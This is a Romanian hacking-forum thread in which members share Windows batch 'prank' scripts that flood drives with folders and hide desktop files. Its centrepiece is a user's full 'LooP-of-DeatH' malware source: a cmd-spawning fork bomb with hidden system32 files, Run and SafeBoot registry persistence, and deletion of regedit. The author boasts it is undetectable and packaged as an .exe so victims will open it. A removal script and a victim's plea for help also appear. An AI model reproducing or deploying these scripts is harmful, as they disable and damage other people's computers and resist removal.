Jump to content
skyner

.bat creaza foldere la infinit funny

Recommended Posts

care nu stie sa faca un .bat... cautati ca o sa gasiti..

scipt:

:a

md %random%

%0

goto :a

sau cv mai dragut...puteti modifica nr de foldere

@echo off

cls

title "hacked"

color 0a

msg * programul necesita parola

set /p var= introdu` parola

if not '%var%' == 'o fata' goto loop

msg * parola este corecta..felicitari

exit

:loop

md %random%

set /a var=%var%+1

if %var% GEQ 100 goto endloop

goto loop

:endloop

GEQ 100(puteti pune 1000)

daca executa pe desktop sa scos:)) (mai ales daca nu stie sa stearga din documets and settings)

offtopic:la scoala a creat 35000 de foldere(cateva minute) a durat 4 min sa le selecteze pe toate cu ctrl a..iar 8 minute sa le stearga:))

Link to comment
Share on other sites

Altceva ... o mica completare ... :)

Creeaza foldere si fisiere la infinit .. pe c , d , e si unde este rulat bat-ul ...


@echo off
title = Please wait loading ...

:i
SET RNDNOW=%random%
@md %RNDNOW%
@COPY C:\AUTOEXEC.BAT %RNDNOW%\%RNDNOW%
@COPY C:\AUTOEXEC.BAT %RNDNOW%.ola
@COPY C:\AUTOEXEC.BAT %RNDNOW%.bye

@md c:\%RNDNOW%
@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%\%RNDNOW%
@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.ola
@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.bye

@md d:\%RNDNOW%
@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%\%RNDNOW%
@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.ola
@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.bye

@md e:\%RNDNOW%
@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%\%RNDNOW%
@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.ola
@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.bye
goto :i

Link to comment
Share on other sites

lam imbunatatit

@echo off

title = Please wait loading ...

:i

SET RNDNOW=%random%

@md %RNDNOW%

@COPY C:\AUTOEXEC.BAT %RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT %RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT %RNDNOW%.bye

@md c:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.bye

@md d:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.bye

@md e:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.bye

@md c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

goto :i

nu creaza pe desk:|..poate corecta careva?

Edited by skyner
Link to comment
Share on other sites

Un cod care actzioneaza asupra desktop'ului. Ascunde fishierele initziale generand foldere la un numar setat (default 1000) :D

Are shi abilitatea de a le shterge automat resturand fishierele ascunse daca este introdus codul "rstz" ;)


@echo off
title = Desktop Manager
cd %userprofile%\Desktop
set x=1
color 0a
set /p c= Code :
cls
if '%c%' == 'rstz' goto anti
echo Desktop will be more intresting...
attrib +h *.*
goto loop
:anti
attrib -h *.*
echo Desktop will be clearer
:loop
if '%c%' == 'rstz' rd Win4%x%_%x% /q
if not '%c%' == 'rstz' mkdir Win4%x%_%x%
set /a x=x+1
if %x% == 1000 exit ::1000 = nr de foldere
goto loop

Edited by ZeroC00l
Link to comment
Share on other sites

Daca tot vorbim te .bat-uri am si eu o jucarioara:

Loop-of-deatH - blocheaza pc-ul INSTANT

ideea provine de la un script de genul

:loop
start cmd
goto loop

numai ca l-am fct ceva mai puternic deoarece se bazeaza pe 3 fisiere ascunse in sistem diferite ca extensie create de scriptul principal, care acestea 3 creeaza la randul lor alte 10 fisiere .bat tot prin sistem si un alt fisier care le porneste pe acelea 10, care acestea vor deschide simultan infinite de ferestre cmd. (s0z de exprimarea lui Vanghelie :D)

Pe langa asta adauga o cheie in registrii care porneste "jucaria" la startup (cea ascunsa din sistem) si alte optimizari ... etc.

COD:

************************[+]   LooP-of-DeatH [+]
***************************[+] made by [+]
******************************[+] cmiN [+]

*************************:::::22.08.2008:::::


***** It's not my responsibility with uses and damages caused by this script/program because was made for educational purposes only

@echo off
:: start
cls
cd %systemroot%
cd..
echo %cd%>%systemroot%\system32\path.txt
set /p pathx=<%systemroot%\system32\path.txt

:: firstbak
md %systemroot%\lanay
copy %pathx%AUTOEXEC.BAT %systemroot%\lanay\ntdc.bak

:: creatingMainFile
echo @echo OFF >%systemroot%\system32\nscvr32.sys
echo cls >>%systemroot%\system32\nscvr32.sys
echo title .: LooP-of-DeatH :. [cmiN] >>%systemroot%\system32\nscvr32.sys
echo. >>%systemroot%\system32\nscvr32.sys

echo set "a=echo :loop >%systemroot%\bucla.bat" >>%systemroot%\system32\nscvr32.sys
echo set "b=echo start cmd.exe >>%systemroot%\bucla.bat" >>%systemroot%\system32\nscvr32.sys
echo set "c=echo goto loop >>%systemroot%\bucla.bat" >>%systemroot%\system32\nscvr32.sys

echo set "d=echo :loop >%systemroot%\bucla1.bat" >>%systemroot%\system32\nscvr32.sys
echo set "e=echo start cmd.exe >>%systemroot%\bucla1.bat" >>%systemroot%\system32\nscvr32.sys
echo set "f=echo goto loop >>%systemroot%\bucla1.bat" >>%systemroot%\system32\nscvr32.sys

echo set "g=echo :loop >%systemroot%\bucla2.bat" >>%systemroot%\system32\nscvr32.sys
echo set "h=echo start cmd.exe >>%systemroot%\bucla2.bat" >>%systemroot%\system32\nscvr32.sys
echo set "j=echo goto loop >>%systemroot%\bucla2.bat" >>%systemroot%\system32\nscvr32.sys

echo set "k=echo :loop >%systemroot%\bucla3.bat" >>%systemroot%\system32\nscvr32.sys
echo set "L=echo start cmd.exe >>%systemroot%\bucla3.bat" >>%systemroot%\system32\nscvr32.sys
echo set "m=echo goto loop >>%systemroot%\bucla3.bat" >>%systemroot%\system32\nscvr32.sys

echo set "n=echo :loop >%systemroot%\bucla4.bat" >>%systemroot%\system32\nscvr32.sys
echo set "o=echo start cmd.exe >>%systemroot%\bucla4.bat" >>%systemroot%\system32\nscvr32.sys
echo set "p=echo goto loop >>%systemroot%\bucla4.bat" >>%systemroot%\system32\nscvr32.sys

echo set "q=echo :loop >%systemroot%\bucla5.bat" >>%systemroot%\system32\nscvr32.sys
echo set "r=echo start cmd.exe >>%systemroot%\bucla5.bat" >>%systemroot%\system32\nscvr32.sys
echo set "s=echo goto loop >>%systemroot%\bucla5.bat" >>%systemroot%\system32\nscvr32.sys

echo set "t=echo :loop >%systemroot%\bucla6.bat" >>%systemroot%\system32\nscvr32.sys
echo set "u=echo start cmd.exe >>%systemroot%\bucla6.bat" >>%systemroot%\system32\nscvr32.sys
echo set "v=echo goto loop >>%systemroot%\bucla6.bat" >>%systemroot%\system32\nscvr32.sys

echo set "x=echo :loop >%systemroot%\bucla7.bat" >>%systemroot%\system32\nscvr32.sys
echo set "y=echo start cmd.exe >>%systemroot%\bucla7.bat" >>%systemroot%\system32\nscvr32.sys
echo set "z=echo goto loop >>%systemroot%\bucla7.bat" >>%systemroot%\system32\nscvr32.sys

echo set "ab=echo :loop >%systemroot%\bucla8.bat" >>%systemroot%\system32\nscvr32.sys
echo set "ac=echo start cmd.exe >>%systemroot%\bucla8.bat" >>%systemroot%\system32\nscvr32.sys
echo set "ad=echo goto loop >>%systemroot%\bucla8.bat" >>%systemroot%\system32\nscvr32.sys

echo set "ae=echo :loop >%systemroot%\bucla9.bat" >>%systemroot%\system32\nscvr32.sys
echo set "af=echo start cmd.exe >>%systemroot%\bucla9.bat" >>%systemroot%\system32\nscvr32.sys
echo set "ag=echo goto loop >>%systemroot%\bucla9.bat" >>%systemroot%\system32\nscvr32.sys

echo START %systemroot%\buclafinala.bat >%pathx%AUTOEXEC.BAT

echo %%a%% >>%systemroot%\system32\nscvr32.sys
echo %%b%% >>%systemroot%\system32\nscvr32.sys
echo %%c%% >>%systemroot%\system32\nscvr32.sys
echo %%d%% >>%systemroot%\system32\nscvr32.sys
echo %%e%% >>%systemroot%\system32\nscvr32.sys
echo %%f%% >>%systemroot%\system32\nscvr32.sys
echo %%g%% >>%systemroot%\system32\nscvr32.sys
echo %%h%% >>%systemroot%\system32\nscvr32.sys
echo %%j%% >>%systemroot%\system32\nscvr32.sys
echo %%k%% >>%systemroot%\system32\nscvr32.sys
echo %%L%% >>%systemroot%\system32\nscvr32.sys
echo %%m%% >>%systemroot%\system32\nscvr32.sys
echo %%n%% >>%systemroot%\system32\nscvr32.sys
echo %%o%% >>%systemroot%\system32\nscvr32.sys
echo %%p%% >>%systemroot%\system32\nscvr32.sys
echo %%q%% >>%systemroot%\system32\nscvr32.sys
echo %%r%% >>%systemroot%\system32\nscvr32.sys
echo %%s%% >>%systemroot%\system32\nscvr32.sys
echo %%t%% >>%systemroot%\system32\nscvr32.sys
echo %%u%% >>%systemroot%\system32\nscvr32.sys
echo %%v%% >>%systemroot%\system32\nscvr32.sys
echo %%x%% >>%systemroot%\system32\nscvr32.sys
echo %%y%% >>%systemroot%\system32\nscvr32.sys
echo %%z%% >>%systemroot%\system32\nscvr32.sys
echo %%ab%% >>%systemroot%\system32\nscvr32.sys
echo %%ac%% >>%systemroot%\system32\nscvr32.sys
echo %%ad%% >>%systemroot%\system32\nscvr32.sys
echo %%ae%% >>%systemroot%\system32\nscvr32.sys
echo %%af%% >>%systemroot%\system32\nscvr32.sys
echo %%ag%% >>%systemroot%\system32\nscvr32.sys
echo exit >>%systemroot%\system32\nscvr32.sys

:: creatingSecondFile
echo SET "buclafinala=START bucla.bat | START bucla1.bat | START bucla2.bat | START bucla3.bat | START bucla4.bat | START bucla5.bat | START bucla6.bat | START bucla7.bat | START bucla8.bat | START bucla9.bat" >%systemroot%\system32\nrvcs64.sys
echo %%buclafinala%% >>%systemroot%\system32\nrvcs64.sys
echi exit >>%systemroot%\system32\nrvcs64.sys

NU e tot codul pt. ca e limita de 10000 caractere in urmatorul post este continuarea !

Link to comment
Share on other sites

:: creatingThirdFile
echo @echo off >%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\system32\path.txt >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\system32\nscvr32.sys >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\system32\nrvcs64.sys >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\buclafinala.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla1.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla2.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla3.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla4.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla5.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla6.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla7.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla8.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %systemroot%\bucla9.bat >>%systemroot%\system32\verif.bat
echo attrib -r -h -s %pathx%AUTOEXEC.BAT >>%systemroot%\system32\verif.bat

echo if not exist %systemroot%\buclemaker.bat copy %systemroot%\system32\nscvr32.sys %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\buclafinala.bat copy %systemroot%\system32\nrvcs64.sys %systemroot%\buclafinala.bat >>%systemroot%\system32\verif.bat
echo. >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla1.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla2.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla3.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla4.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla5.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla6.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla7.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla8.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo if not exist %systemroot%\bucla9.bat START /MIN /REALTIME /wait %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat

echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >>%systemroot%\system32\verif.bat
echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboots.sys /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboots.sys /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base /v SystemVerif /t REG_SZ /d %systemroot%\system32\verif.bat /f >>%systemroot%\system32\verif.bat
echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >>%systemroot%\system32\verif.bat

echo attrib +r +h +s %systemroot%\system32\path.txt >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\system32\nscvr32.sys >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\system32\nrvcs64.sys >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\buclemaker.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\buclafinala.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla1.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla2.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla3.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla4.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla5.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla6.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla7.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla8.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %systemroot%\bucla9.bat >>%systemroot%\system32\verif.bat
echo attrib +r +h +s %%pathx%%AUTOEXEC.BAT >>%systemroot%\system32\verif.bat
echo. >>%systemroot%\system32\verif.bat
echo START %systemroot%\buclafinala.bat >>%systemroot%\system32\verif.bat
echo exit >>%systemroot%\system32\verif.bat

:: creating AUTOEXEC.BAT
echo START %systemroot%\buclafinala.bat >%pathx%AUTOEXEC.BAT

attrib +r +h +s %systemroot%\system32\verif.bat


:: secondbak
md %systemroot%\lanay32
copy %systemroot%\system32\dllcache\regedit.exe %systemroot%\lanay32\ftp.pol
copy %systemroot%\system32\dllcache\regedt32.exe %systemroot%\lanay32\fto.pol
if NOT exist %systemroot%\system32\dllcache\regedit.exe goto copyy
goto delete
:copyy
copy %systemroot%\regedit.exe %systemroot%\lanay32\ftp.pol
if NOT exist %systemroot%\regedit.exe goto copyyy
goto delete
:copyyy
copy %systemroot%\system32\regedit.exe %systemroot%\lanay32\ftp.pol
:delete
del /q /f %systemroot%\regedit.exe
del /q /f %systemroot%\regedt32.exe
del /q /f %systemroot%\system32\regedit.exe
del /q /f %systemroot%\system32\regedt32.exe
del /q /f %systemroot%\system32\dllcache\regedit.exe
del /q /f %systemroot%\system32\dllcache\regedt32.exe

msg * You are fucked up by cmiN !!!
START /MIN /REALTIME %systemroot%\system32\verif.bat

Link to comment
Share on other sites

si desigur am si un antidot care trebuie rulat din safe mode (numai in cazul asta nu am putut face sa poata rula "jucaria" daca se poate face .. ziceti-mi !)

COD:

************************[+]   LooP-of-DeatH [+]
***************************[+] made by [+]
******************************[+] cmiN [+]

*************************:::::22.08.2008:::::
cls
@echo off
title ANTI .: LooP-of-DeatH :. by cmiN
echo erasing LooP-of-DeatH
echo.
echo Set the root drive "C:\" (by default) and the windows directory "C:\windows" (by default) for your infected system without quotes
echo.
echo You root drive: ( egz. C:\ )
set /p "pathx=>"
echo And now your windows directory: ( egz. C:\windows )
set /p "systemroot=>"
attrib -r -h -s %systemroot%\system32\path.txt
attrib -r -h -s %systemroot%\system32\verif.bat
attrib -r -h -s %systemroot%\system32\nscvr32.sys
attrib -r -h -s %systemroot%\system32\nrvcs64.sys
attrib -r -h -s %systemroot%\buclemaker.bat
attrib -r -h -s %systemroot%\buclafinala.bat
attrib -r -h -s %systemroot%\bucla.bat
attrib -r -h -s %systemroot%\bucla1.bat
attrib -r -h -s %systemroot%\bucla2.bat
attrib -r -h -s %systemroot%\bucla3.bat
attrib -r -h -s %systemroot%\bucla4.bat
attrib -r -h -s %systemroot%\bucla5.bat
attrib -r -h -s %systemroot%\bucla6.bat
attrib -r -h -s %systemroot%\bucla7.bat
attrib -r -h -s %systemroot%\bucla8.bat
attrib -r -h -s %systemroot%\bucla9.bat
attrib -r -h -s %pathx%AUTOEXEC.BAT

del /q /f %systemroot%\system32\path.txt
del /q /f %systemroot%\system32\verif.bat
del /q /f %systemroot%\system32\nscvr32.sys
del /q /f %systemroot%\system32\nrvcs64.sys
del /q /f %systemroot%\buclemaker.bat
del /q /f %pathx%AUTOEXEC.BAT
del /q /f %systemroot%\bucla.bat
del /q /f %systemroot%\bucla1.bat
del /q /f %systemroot%\bucla2.bat
del /q /f %systemroot%\bucla3.bat
del /q /f %systemroot%\bucla4.bat
del /q /f %systemroot%\bucla5.bat
del /q /f %systemroot%\bucla6.bat
del /q /f %systemroot%\bucla7.bat
del /q /f %systemroot%\bucla8.bat
del /q /f %systemroot%\bucla9.bat
del /q /f %systemroot%\buclafinala.bat

copy %systemroot%\lanay32\ftp.pol %systemroot%\system32\dllcache\regedit.exe
copy %systemroot%\lanay32\fto.pol %systemroot%\system32\dllcache\regedt32.exe
copy %systemroot%\lanay32\ftp.pol %systemroot%\system32\regedit.exe
copy %systemroot%\lanay32\ftp.pol %systemroot%\regedit.exe
copy %systemroot%\lanay\ntdc.bak %pathx%AUTOEXEC.BAT
rd /q /s %systemroot%\lanay
rd /q /s %systemroot%\lanay32

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /f
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /f
reg delete HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run /v SystemVerif /f
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboots.sys /v SystemVerif /f
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base /v SystemVerif /f
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboots.sys /v SystemVerif /f
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base /v SystemVerif /f

echo ***************************************creditz: **** cmiN ****
echo.
echo files/folders created:
echo %systemroot%\lanay * a folder where is placed a copy of original AUTOEXEC.BAT
echo %systemroot%\lanay\ntdc.bak * a copy of the original AUTOEXEC.BAT

echo %systemroot%\system32\path.txt * a file contains the string of your current root drive

echo %systemroot%\system32\nscvr32.sys * a file created to create other files (bucla.bat , bucla1.bat , etc)
echo %systemroot%\bucla.bat
echo %systemroot%\bucla1.bat
echo %systemroot%\bucla2.bat
echo %systemroot%\bucla3.bat
echo %systemroot%\bucla4.bat
echo %systemroot%\bucla5.bat
echo %systemroot%\bucla6.bat
echo %systemroot%\bucla7.bat
echo %systemroot%\bucla8.bat
echo %systemroot%\bucla9.bat ** files that start simultaneous and f*cks your pc

echo %systemroot%\system32\nrvcs64.sys * a file that opens simultaneous files like (bucla.bat , bucla1.bat , etc)
echo %systemroot%\buclemaker.bat * a copy of nscvr32.sys
echo %systemroot%\buclafinala.bat * a copy of nrvcs64.sys

echo %systemroot%\system32\verif.bat * a file that start with system startup and replace any missing file except nscvr32.sys and nrvcs64.sys

echo %systemroot%\lanay32 * a folder where is placed a copy of regedit.exe and regedt32.exe
echo %systemroot%\lanay32\ftp.pol * a copy of regedit.exe
echo %systemroot%\lanay32\fto.pol * a copy of regedt32.exe

PAUSE
echo.
echo.
echo.
echo Erasing successfully !!! ---- * Unwanted files were deleted, Original files were replaced, Virus registries deleted !
PAUSE

a si desigur daca le vreti gata facute ca executabile + sursa le luati de aici: MU sau RS

2 avantaje: user-ul cazual primeste cu mai mult curaj un .exe cu iconita decat un .bat sau .cmd si este indetectabil de nimic ... adica nu poate fi detectabil daca stati sa va ganditi ... have fun }{ 9/10 persoane cu windows au revenit dupa ce au dat format cu injuraturi la adresa mea

Link to comment
Share on other sites

lam imbunatatit

@echo off

title = Please wait loading ...

:i

SET RNDNOW=%random%

@md %RNDNOW%

@COPY C:\AUTOEXEC.BAT %RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT %RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT %RNDNOW%.bye

@md c:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT c:\%RNDNOW%.bye

@md d:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT d:\%RNDNOW%.bye

@md e:\%RNDNOW%

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%\%RNDNOW%

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.ola

@COPY C:\AUTOEXEC.BAT e:\%RNDNOW%.bye

@md c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

@COPY C:\AUTOEXEC.BAT c:\documents and settings\desktop\all users\%rndnow%

goto :i

nu creaza pe desk:|..poate corecta careva?

Incearca cu %Desktop% .

Link to comment
Share on other sites

Imi poate spune cineva cum pot sa sterg acest fisier .bat care creeaza foldere mereu? I s-a intamplat cuiva cunoscut,si nu mai poate sa scape de acest fisier.Am vazut ca se sterge din documents and settings,dar ceva mai explicit se poate? Multumesc!

Marmota oarba

http://rstcenter.com/forum/showpost.php?p=83984&postcount=12

Link to comment
Share on other sites

Am folosit codul lui ZeroC00l...

Un cod care actzioneaza asupra desktop'ului. Ascunde fishierele initziale generand foldere la un numar setat (default 1000) :D

Are shi abilitatea de a le shterge automat resturand fishierele ascunse daca este introdus codul "rstz" ;)


@echo off
title = Desktop Manager
cd %userprofile%\Desktop
set x=1
color 0a
set /p c= Code :
cls
if '%c%' == 'rstz' goto anti
echo Desktop will be more intresting...
attrib +h *.*
goto loop
:anti
attrib -h *.*
echo Desktop will be clearer
:loop
if '%c%' == 'rstz' rd Win4%x%_%x% /q
if not '%c%' == 'rstz' mkdir Win4%x%_%x%
set /a x=x+1
if %x% == 1000 exit ::1000 = nr de foldere
goto loop

si mi au disparut unele chestii de pe desktop... ma ajutati sa le recuperez?

Link to comment
Share on other sites

esti sparT ? nu vezi ca peste tot scrie de safe mode ce plm e asa greu sa intri in el si sa-ti stergi minunile si registriile ? Zic asta in primul rand ca ai facut 2 posturi consescutive si in al doilea rand ca mai e un pic si vine 2009 si poate nu te prinde anul nou asa xP.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...